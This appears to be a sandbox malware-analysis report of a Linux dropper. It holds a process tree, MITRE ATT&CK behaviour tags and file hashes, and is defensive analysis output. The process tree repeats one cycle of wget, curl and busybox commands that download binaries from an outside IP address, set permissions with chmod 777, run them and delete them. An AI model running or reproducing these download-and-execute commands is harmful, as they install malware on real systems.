/usr/bin/curlcurl -O http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:943
-
-
/bin/chmodchmod 777 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8./TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:946
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:949
-
-
/bin/chmodchmod 777 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv./pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:955
-
-
/bin/chmodchmod 777 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl./RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:961
-
-
/bin/chmodchmod 777 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ./0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:967
-
-
/bin/chmodchmod 777 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0./UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:973
-
-
/bin/chmodchmod 777 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn./kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:976
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:977
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:979
-
-
/bin/chmodchmod 777 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox./T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:982
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97